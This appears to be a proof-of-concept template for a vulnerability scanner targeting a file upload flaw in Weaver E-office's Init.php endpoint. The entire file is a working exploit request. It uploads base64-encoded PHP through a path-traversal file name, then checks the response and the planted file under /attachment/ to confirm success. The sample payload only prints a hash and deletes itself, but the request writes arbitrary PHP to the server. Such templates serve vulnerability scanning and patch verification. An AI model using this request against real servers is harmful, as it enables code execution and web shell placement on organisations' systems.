<DudePoc_Name>泛微 E-office init.php 文件上传漏洞</DudePoc_Name>
<DudePoc_Description></DudePoc_Description>
<DudePoc_SetHeader>
GET /E-mobile/App/Init.php?m=createDo_Email&upload_file=PD9waHAgZWNobyBtZDUoMjMzKTt1bmxpbmsoX19GSUxFX18pPz4=&file_name=../testa123.php HTTP/1.1
Host: $<AttackHost>$
Referer: $<AttackReferer>$/
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>

</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>^(?=.*?(?:提交成功|新建成功)).*?$</DudePoc_VerifyData>
<DudePoc_VerifyFile>/attachment/testa123.php</DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
